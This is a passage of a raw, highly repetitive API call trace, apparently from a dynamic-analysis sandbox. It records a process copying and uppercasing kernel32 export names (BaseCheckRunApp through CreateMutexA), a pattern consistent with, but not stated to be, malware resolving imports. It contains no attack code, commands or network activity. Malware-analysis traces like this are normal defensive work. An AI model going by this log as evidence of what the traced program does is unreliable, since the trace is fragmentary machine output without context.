returned="BaseCheckRunApp" [0082.887] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.887] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.887] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.887] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.887] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.887] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.887] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.887] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.887] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.887] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.887] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.887] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.887] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.887] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.888] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.888] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.888] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.888] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.888] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.888] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.888] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.888] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.888] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.888] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.888] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.888] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.888] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.888] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.888] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.888] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.888] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.888] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.888] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.888] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.888] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.888] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.888] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.888] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.888] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.888] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.888] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.888] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.888] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.888] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.888] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.888] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.888] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.888] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.888] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.888] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.888] lstrlenA (lpString="BEEP") returned 4 [0082.889] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.889] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.889] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.889] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.889] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.889] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.889] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.889] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.889] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.889] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.889] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.889] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.889] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.889] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.889] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.889] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.889] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.889] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.889] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.889] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.889] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.889] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.889] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.889] lstrlenA (lpString="CANCELIO") returned 8 [0082.889] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.889] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.889] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.889] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.889] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.889] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.889] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.889] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.889] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.889] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.889] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.889] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.889] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.890] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.890] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.890] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.890] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.890] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.890] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.890] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.890] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.890] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.890] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.890] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.890] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.890] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.890] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.890] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.890] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.890] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.890] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.890] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.890] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.891] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.891] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.891] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.891] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.891] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.891] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.891] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.891] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.891] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.891] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.891] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.891] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.891] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.891] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.891] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.891] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.891] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.891] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.891] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.892] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.892] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.892] lstrlenA (lpString="COPYFILEA") returned 9 [0082.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.892] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.892] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.892] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.892] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.892] lstrlenA (lpString="COPYFILEW") returned 9 [0082.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.892] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.892] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.892] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.892] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.892] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.892] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.892] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.892] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.892] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.892] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.892] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.892] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.893] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.893] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.893] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.893] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.893] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.893] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.893] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.893] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.893] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.893] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.893] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.893] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.893] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.893] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.893] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.893] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.893] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.893] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.893] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.894] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.894] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.894] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.894] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.894] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.894] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.894] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.894] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.894] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") 